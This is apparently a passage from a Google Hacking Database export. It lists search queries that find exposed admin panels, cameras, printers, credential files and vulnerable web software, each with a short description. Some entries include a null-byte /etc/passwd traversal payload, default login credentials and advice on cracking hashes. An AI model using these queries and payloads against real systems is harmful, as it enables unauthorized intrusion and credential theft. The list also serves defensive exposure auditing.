[descr]] [[url]http://www.google.com/search?q=Admin+intitle%3A%22eZ+publish+administration%22[url]] [[dork]Admin intitle:"eZ publish administration"[dork]] [end][559]] [[start][560] [[title]inurl:administrator "welcome to mambo"[title]] [[descr]Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.

Vendor: http://www.mamboserver.com/

Cross-site scripting and SQL injection exist in some 4.5 versions; the current version is 4.5.1RC3.

Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc[descr]] [[url]http://www.google.com/search?q=inurl%3Aadministrator+%22welcome+to+mambo%22[url]] [[dork]inurl:administrator "welcome to mambo"[dork]] [end][560]] [[start][561] [[title]"Powered by DCP-Portal v5.5"[title]] [[descr]DCP-Portal is more a community system than a CMS - it nevertheless calls itself a CMS. They have never seen a real CMS. Version 5.5 is vulnerable to SQL injection.

Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc[descr]] [[url]http://www.google.com/search?q=%22Powered+by+DCP-Portal+v5.5%22[url]] [[dork]"Powered by DCP-Portal v5.5"[dork]] [end][561]] [[start][562] [[title]inurl:"typo3/index.php?u=" -demo[[title]] [[descr]TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.

Vendor: http://www.typo3.com/
Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc

[descr]] [[url]http://www.google.com/search?q=inurl%3A%22typo3%2Findex.php%3Fu%3D%22+-demo[url]] [[dork]inurl:"typo3/index.php?u=" -demo[dork]] [end][562]] [[start][563] [[title]intitle:index.of (inurl:fileadmin | intitle:fileadmin)[[title]] [[descr]TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.

The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. Normally no sensitive data will be stored here, except for data made available in restricted areas.

Unprotected fileadmin directories can be found by an attacker using this query.

Vendor: http://www.typo3.com/[descr]] [[url]http://www.google.com/search?q=intitle%3Aindex.of+%28inurl%3Afileadmin+%7C+intitle%3Afileadmin%29[url]] [[dork]intitle:index.of (inurl:fileadmin | intitle:fileadmin)[dork]] [end][563]] [[start][564] [[title]Quicksite demopages for Typo3[[title]] [[descr]TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.

The quicksite package is a demo site for TYPO3. Quicksite or Testsite will install a complete website of a soccer club using the following credentials:

user:admin
password:password

If you want to log in, again append "typo3" to the website directory.
Vendor: http://www.typo3.com/

An attacker will consider this as yet another way to find TYPO3 hosts for which SecurityFocus lists vulnerabilities.[descr]] [[url]http://www.google.com/search?q=%22FC+Bigfeet%22+-inurl%3Amail[url]] [[dork]"FC Bigfeet" -inurl:mail[dork]] [end][564]] [[start][565] [[title]site:netcraft.com intitle:That.Site.Running Apache[[title]] [[descr]Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site.

So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.

This search is easily modified (replace "apache" with the other server software), thus adding yet another way to find the web server software version info. [descr]] [[url]http://www.google.com/search?q=site%3Anetcraft.com+intitle%3AThat.Site.Running+Apache[url]] [[dork]site:netcraft.com intitle:That.Site.Running Apache[dork]] [end][565]] [[start][566] [[title]ext:log "Software: Microsoft Internet Information Services *.*"[title]] [[descr]Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: login names (FTP service), path information, database names, and so on.

Examples:
12:09:37 194.236.57.10 [2501]USER micze 331
12:09:38 194.236.57.10 [2501]PASS - 230

08:30:38 194.236.57.10 [2416]DELE com-gb97.mdb

2000-06-18 15:08:30 200.16.212.225 activeip\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -[descr]] [[url]http://www.google.com/search?q=ext:log+%22Software:+Microsoft+Internet+Information+Services+*.*%22[url]] [[dork]ext:log "Software: Microsoft Internet Information Services *.*"[dork]] [end][566]] [[start][567] [[title]filetype:cgi inurl:tseekdir.cgi[[title]] [[descr]The Turbo Seek search engine has a vulnerability. A remote user can view the contents of files on the target. A remote user can request a URL with the name of a file followed by a NULL byte (%00) to force the system to display the contents of the requested file, for example:

/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00

More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html[descr]] [[url]http://www.google.com/search?q=filetype%3Acgi+inurl%3Atseekdir.cgi[url]] [[dork]filetype:cgi inurl:tseekdir.cgi[dork]] [end][567]] [[start][568] [[title]"Powered by phpOpenTracker" Statistics[[title]] [[descr]phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.php

A prebuilt sample report is shipped with phpOpenTracker and is used by most sites. This report does not use all possibilities of the framework, like user tracking. [descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+phpOpenTracker%22+Statistics+&btnG=Google+Search[url]] [[dork]"Powered by phpOpenTracker" Statistics [dork]] [end][568]] [[start][569] [[title]filetype:vcs vcs[[title]] [[descr]Filext.com says: "Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written."

The most common use is the "vCalendar File", used by Outlook for example. It can also belong to a "Palm vCal Desktop Application". For those who prefer clean searches, try these variations (with fewer results):

"PRODID: PalmDesktop Generated"
filetype:vcs VCALENDAR
filetype:vcs BEGIN:VCALENDAR
[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Avcs+vcs[url]] [[dork]filetype:vcs vcs[dork]] [end][569]] [[start][581] [[title]filetype:config config intext:appSettings "User ID"[title]] [[descr]These files generally contain configuration information for a .NET web application: things like connection strings to databases, file directories and more. On a properly set up IIS these files are normally not served to the public.[descr]] [[url]http://www.google.com/search?q=filetype%3Aconfig+config+intext%3AappSettings+%22User+ID%22[url]] [[dork]filetype:config config intext:appSettings "User ID"[dork]] [end][581]] [[start][582] [[title]inurl:"/catalog.nsf" intitle:catalog[[title]] [[descr]This will return servers which are running versions of Lotus Domino. The catalog.nsf is the server's DB catalog. It will list all the DBs on the server and sometimes some juicy info too. An attacker can back the URL down to the "/catalog.nsf" part if needed.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22%2Fcatalog%2Ensf%22+intitle%3Acatalog[url]] [[dork]inurl:"/catalog.nsf" intitle:catalog[dork]] [end][582]] [[start][583] [[title]filetype:pst inurl:"outlook.pst"[title]] [[descr]All versions of the popular business groupware client called Outlook have the possibility to store email, calendars and more in a file for backup or migration purposes.

An attacker may learn a great deal about the owner or the company by downloading these files and importing them into his own client for his viewing pleasure.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apst+inurl%3A%22outlook.pst%22[url]] [[dork]filetype:pst inurl:"outlook.pst"[dork]] [end][583]] [[start][585] [[title]"index of/" "ws_ftp.ini" "parent directory"[title]] [[descr]This search is a cleanup of a previous entry by J0hnny. It uses "parent directory" to avoid results other than directory listings.

WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords.

There is another way to find this file, that was added by Xewan:



In our experience it's good to try both methods, as the results will differ quite a bit.[descr]] [[url]http://www.google.com/search?num=100&hl=en&q=%22index+of%2F%22+%22ws_ftp.ini%22+%22parent+directory%22[url]] [[dork]"index of/" "ws_ftp.ini" "parent directory"[dork]] [end][585]] [[start][586] [[title]filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)[[title]] [[descr]Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability.

http://securityfocus.com/bid/11148/discussion/[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3Aindex.php+inurl%3A%22module%3Dsubjects%22+inurl%3A%22func%3D*%22+%28listpages%7C+viewpage+%7C+listcat%29&btnG=Google+Search[url]] [[dork]filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)[dork]] [end][586]] [[start][587] [[title]filetype:cgi inurl:pdesk.cgi[[title]] [[descr]PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.

http://www.securitytracker.com/alerts/2004/Sep/1011276.html

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Acgi+inurl%3Apdesk.cgi&btnG=Search[url]] [[dork]filetype:cgi inurl:pdesk.cgi[dork]] [end][587]] [[start][588] [[title]ext:ldif ldif[[title]] [[descr]www.filext.com says LDIF = LDAP Data Interchange Format.

LDAP is used for nearly everything nowadays, so this file may include some juicy info for attackers. They can add INTEXT:keyword to get more specific targets.

[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=ext%3Aldif+ldif&btnG=Google+Search[url]] [[dork]ext:ldif ldif[dork]] [end][588]] [[start][589] [[title]inurl:mewebmail[[title]] [[descr]MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.

This search is a portal search. It finds the login screens. If a vulnerability is found, this search becomes the target base for an attacker.[descr]] [[url]http://www.google.com/search?q=inurl:mewebmail&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]inurl:mewebmail[dork]] [end][589]] [[start][590] [[title]"Powered by IceWarp Software" inurl:mail[[title]] [[descr]IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.

There are two ways to find installations of IceWarp:

"Powered by IceWarp Software" inurl:mail
intitle:"IceWarp Web Mail" inurl:":32000/mail/"

http://www.securityfocus.com/bid/10920[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+IceWarp+Software%22+inurl%3Amail[url]] [[dork]"Powered by IceWarp Software" inurl:mail[dork]] [end][590]] [[start][591] [[title]inurl:/_layouts/settings[[title]] [[descr]With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/

Loads of company info can be gained by an attacker when the URLs are unprotected. Furthermore, unprotected SharePoint sites give full "Edit, Add and Delete access" to the information, which in case of malicious users may cause loss of important data.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][591]] [[start][592] [[title]intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)[[title]] [[descr]The remote user can reportedly view the first string of any file on the system where the script is installed. This is a very old bug, but some sites never upgraded their MRTG installations.

http://www.securitytracker.com/alerts/2002/Feb/1003426.html

An attacker will find it difficult to exploit this in any useful way, but it does expose one line of text from a file; for example (using the file /etc/passwd) it shows this:

ERROR: CFG Error Unknown Option "root:x:0:1:super-user:/" on line 2 or above.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22MRTG%2FRRD%22+1.1*+%28inurl%3Amrtg.cgi+%7C+inurl%3A14all.cgi+%7Ctraffic.cgi%29+&btnG=Search[url]] [[dork]intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi) [dork]] [end][592]] [[start][593] [[title]filetype:mdb wwforum[[title]] [[descr]Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).

vendor: http://www.webwizguide.info/web_wiz_forums/

The forum database contains the members passwords, either encrypted or in plain text, depending on the version.

Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker.[descr]] [[url]http://www.google.com/search?q=filetype%3Amdb+wwforum[url]] [[dork]filetype:mdb wwforum[dork]] [end][593]] [[start][594] [[title]"Powered By Elite Forum Version *.*"[title]] [[descr]Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:

<#!LNUM!#>4<#!ENDLNUM!#>
<#!MAXID!#>2<#!ENDMAXID!#>
<#!USER!#>
<#!UNAME!#>administrat<#!ENDUNAME!#>
<#!PWORD!#>4571XXX367b52XXXb33b6ce74df1e017<#!ENDPWORD!#>
<#!DBID!#>0<#!ENDDBID!#>
<#!ENDUSER!#>

(data was xx'd)

These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving administrator access to the forum.[descr]] [[url]http://www.google.com/search?q=%22Powered+By+Elite+Forum+Version+*.*%22[url]] [[dork]"Powered By Elite Forum Version *.*"[dork]] [end][594]] [[start][595] [[title]intitle:"microsoft certificate services" inurl:certsrv[[title]] [[descr]Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as "proof" that someone or something is what they claim they are.

The Microsoft certificates are meant to be used with IIS, for example with Outlook Web Access. The users of these certificates have to decide if they trust them or not. If they do, they can import a root certificate into their browsers (IE).

Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet, which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22microsoft+certificate+services%22+inurl%3Acertsrv&btnG=Search[url]] [[dork]intitle:"microsoft certificate services" inurl:certsrv[dork]] [end][595]] [[start][596] [[title]intitle:"webadmin - /*" filetype:php directory filename permission[[title]] [[descr]Webadmin.php is a free simple web-based file manager. This search finds sites that use this software. If left unprotected, an attacker can modify or add files on the server.

More info and screenshot at: http://cker.name/webadmin/[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22webadmin+-+%2F*%22+f[url]] [[dork]intitle:"webadmin - /*" f[dork]] [end][596]] [[start][598] [[title]intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)[[title]] [[descr]First of all, this search indicates Solaris machines, and second, the web service is vulnerable to a format string attack.

Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical files.

http://www.securiteam.com/unixfocus/5SP081F80K.htm[descr]] [[url]http://www.google.com/search?num=100&&q=intitle%3AAnswerBook2+inurl%3Aab2%2F+%28inurl%3A8888+%7C+inurl%3A8889%29[url]] [[dork]intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)[dork]] [end][598]] [[start][599] [[title]More Axis netcams ![[title]] [[descr]More Axis netcams. This search combines the cams with the default title (Live View) and extends it by searching for the "view/view.shtml" URL identifier. Models found with this search are:

AXIS 205 version 4.02
AXIS 206M Network Camera version 4.10
AXIS 206W Network Camera version 4.10
AXIS 211 Network Camera version 4.02
AXIS 241S Video Server version 4.02
AXIS 241Q Video Server version 4.01
Axis 2100 Network Camera
Axis 2110 Network Camera 2.34
Axis 2120 Network Camera 2.40
AXIS 2130R PTZ Network Camera

[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml%5E[url]] [[dork]intitle:"Live View / - AXIS" | inurl:view/view.shtml^[dork]] [end][599]] [[start][600] [[title]intitle:"The AXIS 200 Home Page"[title]] [[descr]The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings.[descr]] [[url]http://www.google.com/search?q=intitle:%22The+AXIS+200+Home+Page%22[url]] [[dork]intitle:"The AXIS 200 Home Page"[dork]] [end][600]] [[start][601] [[title]("Fiery WebTools" inurl:index2.html) | "WebTools enable * * observe, *, * * * flow * print jobs"[title]] [[descr]Fiery WebTools offers many of the same capabilities of the Command WorkStation™, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%28%22Fiery+WebTools%22+inurl%3Aindex2.html%29+%7C+%22WebTools+enable+*+*+observe%2C+*%2C+*+*+*+flow+*+print+jobs%22&btnG=Search[url]] [[dork]("Fiery WebTools" inurl:index2.html) | "WebTools enable * * observe, *, * * * flow * print jobs"[dork]] [end][601]] [[start][602] [[title]Konica Network Printer Administration[[title]] [[descr]This finds Konica Network Printer Administration pages. There is one result at the time of writing.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22network+administration%22+inurl%3A%22nic%22[url]] [[dork]intitle:"network administration" inurl:"nic"[dork]] [end][602]] [[start][603] [[title]Aficio 1022[[title]] [[descr]The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities.

[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Asts_index.cgi[url]] [[dork]inurl:sts_index.cgi[dork]] [end][603]] [[start][604] [[title]intitle:RICOH intitle:"Network Administration"[title]] [[descr]Network Administration pages for several Ricoh Aficio printer models, for example the Aficio 1018D and RICOH LASER AP1600.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3ARICOH+intitle%3A%22Network+Administration%22[url]] [[dork]intitle:RICOH intitle:"Network Administration"[dork]] [end][604]] [[start][605] [[title]intitle:"lantronix web-manager"[title]] [[descr]The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected.
[descr]] [[url]http://www.google.com/search?q=intitle:%22lantronix+web-manager%22&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"lantronix web-manager"[dork]] [end][605]] [[start][606] [[title]Canon ImageReady machines[[title]] [[descr]The "large" Canon ImageReady machines with model versions 3300, 5000 & 60000.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22remote+ui%3Atop+page%22[url]] [[dork]intitle:"remote ui:top page"[dork]] [end][606]] [[start][607] [[title]((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))[[title]] [[descr]ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%28%28inurl%3Aifgraph+%22Page+generated+at%22%29+OR+%28%22This+page+was+built+using+ifgraph%22%29%29+&btnG=Search[url]] [[dork]((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) [dork]] [end][607]] [[start][608] [[title]ext:cgi intext:"nrg-" " This web page was created on "[title]] [[descr]NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)[descr]] [[url]http://www.google.com/search?q=ext:cgi+intext:%22nrg-%22+%22+This+web+page+was+created+on+%22&hl=en&lr=&ie=UTF-8&filter=1[url]] [[dork]ext:cgi intext:"nrg-" " This web page was created on "[dork]] [end][608]] [[start][609] [[title]+":8080" +":3128" +":80" filetype:txt[[title]] [[descr]With the string [+":8080" +":3128" +":80" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. 
It also stores the response time in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep...

The script proxytest.sh is on my website:

http://rawlab.relay.homelinux.net/programmi/proxytest.sh[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%2B%22%3A8080%22+%2B%22%3A3128%22+%2B%22%3A80%22+filetype%3Atxt[url]] [[dork]+":8080" +":3128" +":80" filetype:txt[dork]] [end][609]] [[start][611] [[title]ReMOSitory module for Mambo[[title]] [[descr]It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.

Full report: http://www.securityfocus.com/bid/11219

Klouw suggests: inurl:index.php?option=com_remository&Itemid=

Renegade added: ".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up a login box...[descr]] [[url]http://www.google.com/search?q=inurl%3Acom_remository[url]] [[dork]inurl:com_remository[dork]] [end][611]] [[start][614] [[title]inurl:cgi.asx?StoreID [[title]] [[descr]BeyondTV is a web-based software product which lets you manage your TV station. All you need is to install a TV tuner card on your PC and connect your TV source (i.e. television antenna) to your TV tuner card. With an installed BeyondTV version you can now administer your TV with your browser, even over the internet.
[descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Acgi.asx%3FStoreID+%0D%0A+%0D%0A&btnG=Google-Suche&meta=[url]] [[dork]inurl:cgi.asx?StoreID [dork]] [end][614]] [[start][615] [[title]inurl:hp/device/this.LCDispatcher[[title]] [[descr]This one gets you on the web interface of some more HP printers.[descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Ahp%2Fdevice%2Fthis.LCDispatcher+&btnG=Suche&lr=&btnG=Google-Suche&meta=[url]] [[dork]inurl:hp/device/this.LCDispatcher [dork]] [end][615]] [[start][616] [[title]intitle:"WordPress > * > Login form" inurl:"wp-login.php"[title]] [[descr]WordPress is a semantic personal publishing platform. It suffers from possible XSS attacks.

http://www.securityfocus.com/bid/11268/info/[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22WordPress+%3E+*+%3E+Login+form%22+inurl%3A%22wp-login.php%22+&btnG=Search[url]] [[dork]intitle:"WordPress > * > Login form" inurl:"wp-login.php" [dork]] [end][616]] [[start][617] [[title]intitle:webeye inurl:login.ml[[title]] [[descr]This one gets you on the web interface of Webeye webcams.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Awebeye+inurl%3Alogin.ml+&btnG=Search[url]] [[dork]intitle:webeye inurl:login.ml [dork]] [end][617]] [[start][618] [[title]inurl:"comment.php?serendipity"[title]] [[descr]Serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.
For an attacker it is possible to inject SQL commands.

http://www.securityfocus.com/bid/11269/discussion/[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3A%22comment.php%3Fserendipity%22&btnG=Search[url]] [[dork]inurl:"comment.php?serendipity"[dork]] [end][618]] [[start][619] [[title]"Powered by AJ-Fork v.167"[title]] [[descr]AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to
be backwards-compatible with CuteNews in what areas are sensible.

It is vulnerable to a full path disclosure.

http://www.securityfocus.com/bid/11301[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Powered+by+AJ-Fork+v.167%22+%0D%0A&btnG=Search[url]] [[dork]"Powered by AJ-Fork v.167" [dork]] [end][619]] [[start][620] [[title]"Powered by Megabook *" inurl:guestbook.cgi[[title]] [[descr]MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities.


http://www.securityfocus.com/bid/8065[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][620]] [[start][621] [[title]intitle:"axis storpoint CD" intitle:"ip address"[title]] [[descr]Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+.

[descr]] [[url]http://www.google.com/search?q=intitle:%22axis+storpoint+CD%22+intitle:%22ip+address%22&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"axis storpoint CD" intitle:"ip address"[dork]] [end][621]] [[start][622] [[title]intext:SQLiteManager inurl:main.php[[title]] [[descr]SQLiteManager is a multi-language web tool for managing SQLite databases.
# Management of several databases (creation, access or upload of a database)
# Management of attached databases
# Creation, modification and removal of tables and indexes.
# Insertion, modification and deletion of records in these tables [descr]] [[url]http://www.google.com/search?q=intext%3ASQLiteManager+inurl%3Amain.php&btnG=Search&hl=en&lr=&ie=UTF-8[url]] [[dork]intext:SQLiteManager inurl:main.php[dork]] [end][622]] [[start][623] [[title]intitle:"oMail-admin Administration - Login" -inurl:omnis.ch[[title]] [[descr]oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features include multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22oMail-admin+Administration+-+Login%22++-inurl%3Aomnis.ch&btnG=Search[url]] [[dork]intitle:"oMail-admin Administration - Login" -inurl:omnis.ch[dork]] [end][623]] [[start][624] [[title]inurl:"map.asp?" intitle:"WhatsUp Gold"[title]] [[descr]"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management."[descr]] [[url]http://www.google.com/search?q=inurl:%22map.asp%3F%22+intitle:%22WhatsUp+Gold%22&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]inurl:"map.asp?" intitle:"WhatsUp Gold"[dork]] [end][624]] [[start][625] [[title]inurl:" WWWADMIN.PL" intitle:"wwwadmin"[title]] [[descr]wwwadmin.pl is a script that allows a user with a valid username and password to delete files and posts from the associated forum.[descr]] [[url]http://www.google.com/search?q=inurl:%22+WWWADMIN.PL%22+intitle:%22wwwadmin%22&hl=en&lr=&ie=UTF-8&start=0&sa=N[url]] [[dork]inurl:" WWWADMIN.PL" intitle:"wwwadmin"[dork]] [end][625]] [[start][626] [[title]inurl:odbc.ini ext:ini -cvs[[title]] [[descr]This search will show the googler ODBC client configuration files which may contain usernames/databases/IP addresses and whatever.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Aodbc.ini+ext%3Aini+-cvs&btnG=Search[url]] [[dork]inurl:odbc.ini ext:ini -cvs[dork]] [end][626]] [[start][627] [[title]intitle:"Web Data Administrator - Login"[title]] [[descr]The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser.
Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data.[descr]] [[url]http://www.google.com/search?q=intitle:%22Web+Data+Administrator+-+Login%22&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]intitle:"Web Data Administrator - Login"[dork]] [end][627]] [[start][628] [[title]intitle:"Object not found" netware "apache 1.."[title]] [[descr]This search will show netware apache webservers as the result.
[descr]] [[url]http://www.google.com/search?q=intitle:%22Object+not+found%22+netware+%22apache+1..%22&hl=en&lr=&filter=0[url]] [[dork]intitle:"Object not found" netware "apache 1.."[dork]] [end][628]] [[start][629] [[title]intitle:"switch home page" "cisco systems" "Telnet - to"[title]] [[descr]Most Cisco switches ship with a web administration interface. If a switch is reachable from the Internet and Google has cached its home page, this search will show it.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3A%22switch+home+page%22+%22cisco+systems%22+%22Telnet+-+to%22&btnG=Search[url]] [[dork]intitle:"switch home page" "cisco systems" "Telnet - to"[dork]] [end][629]] [[start][630] [[title]intitle:"DEFAULT_CONFIG - HP"[title]] [[descr]Searches for the web interface of HP switches.[descr]] [[url]http://www.google.com/search?q=intitle:%22DEFAULT_CONFIG+-+HP%22&ie=UTF-8&oe=UTF-8[url]] [[dork]intitle:"DEFAULT_CONFIG - HP"[dork]] [end][630]] [[start][631] [[title]"Powered by yappa-ng"[title]] [[descr]yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).

yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.

http://www.securityfocus.com/bid/11314[descr]] [[url]http://www.google.com/search?q=%22Powered+by+yappa-ng%22&hl=en&lr=&filter=0[url]] [[dork]"Powered by yappa-ng"[dork]] [end][631]] [[start][632] [[title]"Active Webcam Page" inurl:8080[[title]] [[descr]Active WebCam is a shareware program for capturing and sharing the video streams from many video devices.

Known bugs: directory traversal and cross-site scripting.
